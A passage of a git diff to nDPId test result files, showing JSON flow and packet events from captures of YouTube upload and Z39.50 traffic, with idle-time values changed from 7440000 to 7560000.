tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tdXBsb2FkLnlvdXR1YmUuY29tUTAzOQHogWCSkhrofu2AhqIVgpFkAAAAQ2hyb21lLzYyLjAuMzIwMi45NCBXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQAAAAAWDUwOQEAAAAeAAAAdZgRWgAAAAA2Qv7BjobCVSSNm3vqxisDs2cBNiW7yusCpyOOCMJF82QAAAABAAAANVJUT5jAAAAAAPAAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1511102578051,"flow_last_seen":1511102578051,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1511102578051,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":62232,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTubeUpload","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"upload.youtube.com","user_agent":"Chrome\/62.0.3202.94 Windows NT 10.0; Win64; x64"}} 02259{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1511102578108,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1511102578108,"pkt":"2MuK4S0uXEl5dU5qCABFAAViAABAADgRtn+s2RdvwKgCGwG78xgFTs8jCAjRAddSQpCnAZLrpBY0DjIhd5jwe0ABH5UBAQD\/\/\/\/1BgCAAVJFSgAIAAAAU1RLADgAAABTTk8AbAAAAFBST0a0AAAAU0NGR1MBAABSUkVKVwEAAFNUVExfAQAAQ1NDVFECAABDUlT\/XwkAAOdd9OCaMJjZHEuQSnBheExXijy9L8yxcLxijUGUgt7VeQLmXHCE0dSCjTwUu4DOXBlw0HTG62CtZtu2a6Ru1X+sH1IA2FJqDRpGVA5MHyMKc7vKtJZUWy6Wq\/FvJH3N94ZirXYSBfeq9Qo8ATBGAiEAppVGAzltTsobgX744i5bBeIqIDO\/YtwFhdblUPMaf9ECIQDgN5eoKUWZEY4A\/yjD3jA5j4ZdDcRSfqhMU1oZUTGdIVNDRkcIAAAAQUVBRAgAAABTQ0lEGAAAAFBETUQcAAAAVEJLUCAAAABQVUJTQwAAAEtFWFNHAAAAT0JJVE8AAABFWFBZVwAAAEFFU0dDQzIw9lqyAICUa+kwugeWBsbKvkNISURUQjEwIAAAhphHmLi5BO0Bd0EZ92vmXccblzalgzbYj90Qfoq9ozBDMjU1MDAwMDAwMDBAFRRaAAAAAAwAAADNfAIAAAAAAADwAHUApLkJkLQYWBSHuxOizGdwCjw1mAT5G9+443fNDsgN3BAAAAFfeBYhgQAABAMARjBEAiBdvW4RdrxYmmjeJbc+3jgs5l6RJLipl3aPIQhj9TtUVgIgA9hjkGDtPgI+WyeFtwtRP0uw9dCVeIWw5SDGQbdmUYsAdwDd6x0reg1PpiCLga2BaHB+Lo6dAdVciI09EcTNtuy+zAAAAV94FiCrAAAEAwBIMEYCIQCUIhZCh2zhmqj0uNpoeUCnAI4TO75j9mv1oMYRKX9EbwIhAIVqH7drJ4DDuKcAhaeeCXOoj8EoQkKnHGLbzkyKPDlhAQEDAeiBYJKSGugAAAAAALsLAAB4u4FGwB+tWGtQE1cUJpBXY6I8VdDyFNEgYZOQAr7wiYpWBawlaIsJ2cBCSCJJwEgVWK3A4KNOsVAVxfdjqlClUhXRURAFClYRHasEpKBgRdBILVjtzS6ETSYz9oczmdmc777Onnvu9527WTQrwFy0TRBKTcQLKrp9dm9xz+ylJ4l0NALQ0SJTNhpMGAZIGIUiTgYb8pXrDXnhuTHeCAI35bB6mBzcF\/AwMggEG8\/l8gN4AQK8oOLyArh8PlZQSS0uRWcy5oK8kSqS5YhoKCFpTNbnCo1cbciulQicavSLSfTLCXLA\/GIy2SCmBhjbXCGAaeAd62cA1adjf2xINJs5VuSOLXMcnO6g0xtjxu1zfIrK71z\/\/lBHSmjev8J8r4IzjW36x8zZNOc0+uStj3j5jQFTCvdXObyJDvLf4usWsNFD234IpYyDUMoYbF1AYEyIMUxgprRFy4BQm1YDYkdGbe4DoxE1cRNlsTkiuSRZgUgwczQwlUpYHofIYWI3ezYnVqbQSIiYI5sjEQfx+cECvhGWo1QwPWhGR4JnLMjJFDVvaGa8k59ILpJp1UisCsNHDLsjIhoybIah1TiI3NROUJramkR0FPHFOKJkc0BjBojNewCvTYGkdWaA2nxIipzgswQmGLCKYEiTCUa8hmAgaoIhlxEMpYmhNmwBbogkgDbw4BmdwRG5YU9wALQmwaAKwbrZDaEpiARWYJAhC1RqQKaxhmEsggUaGWzDvnEJ\/3lDO54Eq5NBL2JvMBWod+IRjNRQW4MlI+YJ2HmtQqPWiGE\/uSJWoUhEjKk3iJt1gyUaXPYxnAZwNUeMxRakTVIchroY"} 02274{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1511102578109,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1511102578109,"pkt":"2MuK4S0uXEl5dU5qCABFAAViAABAADgRtn+s2RdvwKgCGwG78xgFTrFpCAjRAddSQpCnArwHRDvEv6bzYWaHzaQBBSEEhrNWhsBytYq44AhiRo+TwCmwTKGEk42JPpys442NKgutZCyRqQAAtRXqaDF9GcRDYiH0Y\/Fi0MLsDELQGJhY4OvQsShgL0wMj6PF4FCw0EDxBIlYDUjOl0D+boN8rExECEHyX7Bo9gIexu6+BD0Z6jwYVS5xhEFjCAVnb9OEZ+1zI6xu60jhXe7FYiEjXGJWdBF1I+wRdfS48r74X1JeZ567KHa5EJ3pD3ngVQyQUTCSgZUFTVprCgmiU6lxmUwgGRCEl12TIR\/Iu8iryOND7yMz0xaswN6jCztbGOmK9M1HAtnb0p6qNH6hov6O7rqWzJfC2lmeHtZeU6WbjsS8u3ntcJQzOr2oWOwTXcLWes24V6eOPFWo8+TNul2fEFLQ78eM1PXs2XQnqjfDqk3auk2v6+r9pEcxm7ylpmzrihbHoOb9i7fucvoKaS0tCfOsbMqMP3nB9ezFL69FLLtTF+p+dsZl1fPc\/DBpqVvY0e9eHrAZ+VA9+k3JGb\/9upojFbdLGEEHzpW4tGy79WmG8IZ+5InTV7teNKN9mWsYUcLOpqcV59uW1kr1OramoTHz1vv11JzRr2tDd4S\/WkfbF2P7ZGza6rI\/j9Us8WXle5QG\/b6jzfNgyphjqo6oKWSDFJMnAQGwxaXYlmTl4Z1d0i88lvqCkib10ZlL8sf48IBpMSTg8YAY8\/iBmBZzeXzwEwQLgqM\/pux\/6Oa0l01OXX1\/+c6p1ENoy\/3lC8tzQnqdlS7ZoRtbdlT15tR7dEe\/E7HKePNyitQjIpd9cbgeFe\/qfiaMud5KybCv\/DovpHzVwiB95N8TOgZ2djpVNugjWfqwt\/tXNG+oKEpUZF25tdxtEmQz6wFdFS5Lfz91+rFA6vZLi+3IzzZMaO745y137UDe3TWvOGHFc27XdlUmuJypi3zktDjX7YazyO23wuMzY303CxB48w3nqlDPN5G7Ktoywmyvs\/+6kO9uVx38oy25qEe0fpf31qURmsfnntNrHN\/WeyacXdoQapOfb7Pxys\/NacXz+Q0XZq4ta9Z7e19lCXIKCwdG2mlzXAOrircnI\/g3DpRkByLCMjmYFj9jDB9zi+fW\/KMGh8A\/npA75EqgFPvB8xrHUWmTYjFShuyNNEGHqOBhDa5jAvygcyBwwyoCN6wtE0wGiocL7zg1ftXFTvv\/oJAPXPQs8EXNovaf7kkkqasq1vY36F29qncjsStini1pcp7kJZFuH1+dlSGJIedOLC7QMZTl5c4zutP4J9Iv6SmNyouUidqu3dUF52nOcEDd9M6QKlK\/grnxj\/XK1Uve+Vn11FT4bS89njFAcsiu3RvSfjG1ZmrcZ6\/q7\/pYJ88tuiS37l1AWTuTJOy02+fyavOojKMH1wn8z1UfTB\/zTWvuytPdcdnhPtCaI+KIa4F3p3V9yyYFZR1sUJ46vP5m5ZOaqgflXryX78ZeTWvRTfNvvGXb8cOSgXllHhLWeas8yH5iVlRBMCVoVB26EFSw0u7LpTGV75XHW9Nztb6\/wrxD58u4nYzXfW68h\/8B+TYP2QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":137,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1511102576835,"flow_last_seen":1511102576954,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1430,"flow_tot_l4_payload_len":4704,"flow_avg_l4_payload_len":361,"midstream":0,"thread_ts_msec":1511102594936,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":57452,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTubeUpload","breed":"Fun","category":"Media"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":137,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1511102576835,"flow_last_seen":1511102576954,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1430,"flow_tot_l4_payload_len":4704,"flow_avg_l4_payload_len":361,"midstream":0,"thread_ts_msec":1511102594936,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":57452,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTubeUpload","breed":"Fun","category":"Media"}} 00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":137,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":100,"flow_first_seen":1511102576794,"flow_last_seen":1511102580286,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":102276,"flow_avg_l4_payload_len":1022,"midstream":0,"thread_ts_msec":1511102594936,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":51925,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTubeUpload","breed":"Fun","category":"Media"}} 00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":137,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1511102578051,"flow_last_seen":1511102594936,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":14106,"flow_avg_l4_payload_len":587,"midstream":0,"thread_ts_msec":1511102594936,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":62232,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTubeUpload","breed":"Fun","category":"Media"}} 00564{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":137,"source":"youtubeupload.pcap","alias":"nDPId-test","packets-captured":137,"packets-processed":137,"total-skipped-flows":0,"total-l4-data-len":121086,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":23,"global_ts_msec":1511102594936} diff --git a/test/results/z3950.pcapng.out b/test/results/z3950.pcapng.out index 57720f541..6385be3a0 100644 --- a/test/results/z3950.pcapng.out +++ b/test/results/z3950.pcapng.out @@ -1,18 +1,18 @@ 00458{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"z3950.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"z3950.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1623680697296} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623680697296,"flow_last_seen":1623680697296,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623680697296,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"193.174.240.93","src_port":58921,"dst_port":210,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1623680697296,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1623680697296,"pkt":"eJS0JASgYDjgxTWgCABFAAA07vtAAH8Gl6\/AqAJkwa7wXeYpANJ85vsBAAAAAIAC+vCgIgAAAgQFtAEDAwgBAQQC"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1623680697327,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1623680697327,"pkt":"YDjgxTWgeJS0JASgCABFAAA0AABAADYGz6vBrvBdwKgCZADS5indlQhqfOb7AoAS+vC6GgAAAgQFrAEBBAIBAwMH"} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1623680697329,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1623680697329,"pkt":"eJS0JASgYDjgxTWgCABFAAAo7vxAAH8Gl7rAqAJkwa7wXeYpANJ85vsC3ZUIa1AQAgTz0QAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623680697296,"flow_last_seen":1623680697296,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623680697296,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"193.174.240.93","src_port":58921,"dst_port":210,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1623680697296,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1623680697296,"pkt":"eJS0JASgYDjgxTWgCABFAAA07vtAAH8Gl6\/AqAJkwa7wXeYpANJ85vsBAAAAAIAC+vCgIgAAAgQFtAEDAwgBAQQC"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1623680697327,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1623680697327,"pkt":"YDjgxTWgeJS0JASgCABFAAA0AABAADYGz6vBrvBdwKgCZADS5indlQhqfOb7AoAS+vC6GgAAAgQFrAEBBAIBAwMH"} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1623680697329,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1623680697329,"pkt":"eJS0JASgYDjgxTWgCABFAAAo7vxAAH8Gl7rAqAJkwa7wXeYpANJ85vsC3ZUIa1AQAgTz0QAA"} 00550{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":16,"source":"z3950.pcapng","alias":"nDPId-test","packets-captured":16,"packets-processed":15,"total-skipped-flows":0,"total-l4-data-len":4151,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7,"global_ts_msec":1625070123680} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625070123680,"flow_last_seen":1625070123680,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1625070123680,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"129.187.139.43","src_port":46524,"dst_port":9991,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1625070123680,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1625070123680,"pkt":"YDjgxTWgABjzZLGICABFAAA0k\/xAAJAGiSTAqAAUgbuLK7W8JweM39PGAAAAAIAC+vDNyQAAAgQFtAEBBAIBAwMH"} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1625070123709,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1625070123709,"pkt":"ABjzZLGIYDjgxTWgCABFAAA0AABAADUGeCGBu4srwKgAFCcHtbz4JgxZjN\/Tx4ASchDtagAAAgQFrAEBBAIBAwMH"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1625070123709,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1625070123709,"pkt":"YDjgxTWgABjzZLGICABFAAAok\/1AAJAGiS\/AqAAUgbuLK7W8JweM39PH+CYMWlAQAfbNvQAA"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":26,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1623680697296,"flow_last_seen":1623680698846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4151,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1625070132777,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"193.174.240.93","src_port":58921,"dst_port":210,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Z39.50","breed":"Acceptable","category":"Network"}} -00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":26,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1623680697296,"flow_last_seen":1623680698846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4151,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1625070132777,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"193.174.240.93","src_port":58921,"dst_port":210,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1625070123680,"flow_last_seen":1625070196998,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":368,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1625070196998,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"129.187.139.43","src_port":46524,"dst_port":9991,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"Z39.50","breed":"Acceptable","category":"Network"}} -00823{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":31,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1625070123680,"flow_last_seen":1625070200217,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":411,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1625070200217,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"129.187.139.43","src_port":46524,"dst_port":9991,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"Z39.50","breed":"Acceptable","category":"Network"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625070123680,"flow_last_seen":1625070123680,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1625070123680,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"129.187.139.43","src_port":46524,"dst_port":9991,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1625070123680,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1625070123680,"pkt":"YDjgxTWgABjzZLGICABFAAA0k\/xAAJAGiSTAqAAUgbuLK7W8JweM39PGAAAAAIAC+vDNyQAAAgQFtAEBBAIBAwMH"} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1625070123709,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1625070123709,"pkt":"ABjzZLGIYDjgxTWgCABFAAA0AABAADUGeCGBu4srwKgAFCcHtbz4JgxZjN\/Tx4ASchDtagAAAgQFrAEBBAIBAwMH"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1625070123709,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1625070123709,"pkt":"YDjgxTWgABjzZLGICABFAAAok\/1AAJAGiS\/AqAAUgbuLK7W8JweM39PH+CYMWlAQAfbNvQAA"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":26,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1623680697296,"flow_last_seen":1623680698846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4151,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1625070132777,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"193.174.240.93","src_port":58921,"dst_port":210,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Z39.50","breed":"Acceptable","category":"Network"}} +00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":26,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1623680697296,"flow_last_seen":1623680698846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4151,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1625070132777,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"193.174.240.93","src_port":58921,"dst_port":210,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 